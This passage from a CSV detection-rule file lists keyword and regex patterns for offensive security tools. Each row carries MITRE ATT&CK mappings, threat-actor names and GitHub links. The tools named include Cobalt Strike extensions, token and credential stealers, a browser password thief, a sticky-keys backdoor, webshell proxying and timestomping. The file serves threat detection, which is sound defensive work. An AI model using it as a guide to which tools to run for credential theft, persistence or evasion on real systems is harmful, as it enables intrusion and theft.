TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*StartWebServiceBeacon*",".{0,1000}StartWebServiceBeacon.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*static_syscalls_apc_spawn *",".{0,1000}static_syscalls_apc_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_apc_spawn*",".{0,1000}static_syscalls_apc_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_dump*",".{0,1000}static_syscalls_dump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*statistically-likely-usernames*",".{0,1000}statistically\-likely\-usernames.{0,1000}","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. 
simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","8","799","118","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.exe*",".{0,1000}StayKit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.git*",".{0,1000}StayKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Steal_Pipe_Token /PipeName*",".{0,1000}Steal_Pipe_Token\s\/PipeName.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*steal_token *",".{0,1000}steal_token\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*steal_token(*",".{0,1000}steal_token\(.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*steal_token.py*",".{0,1000}steal_token\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*steal_token_access_mask*",".{0,1000}steal_token_access_mask.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike 
Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*steal-cert.py*",".{0,1000}steal\-cert\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*",".{0,1000}StealCookie\-28050355\-D9DF\-4CE7\-BFBC\-4F7DDE890C2A\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*StealDhcpSecrets.c*",".{0,1000}StealDhcpSecrets\.c.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*StealDhcpSecrets.exe*",".{0,1000}StealDhcpSecrets\.exe.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Stealer.exe *",".{0,1000}Stealer\.exe\s.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*",".{0,1000}StealPowerAutomateToken\-C4E7B7DA\-54E4\-49AB\-B634\-FCCD77C65025\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*StealTokenClient.exe *",".{0,1000}StealTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - 
T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*StealTokenClient\StealTokenClient.cs*",".{0,1000}StealTokenClient\\StealTokenClient\.cs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*StealTokenDrv_x64.sys*",".{0,1000}StealTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Sticky Key backdoor has been removed*",".{0,1000}Sticky\sKey\sbackdoor\shas\sbeen\sremoved.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky Keys backdoor added.*",".{0,1000}Sticky\sKeys\sbackdoor\sadded\..{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky Keys backdoor does not exist, let's add 
it*",".{0,1000}Sticky\sKeys\sbackdoor\sdoes\snot\sexist,\slet\'s\sadd\sit.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky-Keys-Slayer*",".{0,1000}Sticky\-Keys\-Slayer.{0,1000}","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","322","70","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" "*StickyNotesExtract.exe*",".{0,1000}StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*stinger_client -*",".{0,1000}stinger_client\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_client.py*",".{0,1000}stinger_client\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_server.exe*",".{0,1000}stinger_server\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*StompySharps.csproj*",".{0,1000}StompySharps\.csproj.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*StompySharps.exe*",".{0,1000}StompySharps\.exe.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*StompySharps.sln*",".{0,1000}StompySharps\.sln.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a 
specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*stopdaisy*",".{0,1000}stopdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StopInveigh*",".{0,1000}StopInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-stop-keylogger*",".{0,1000}\-stop\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 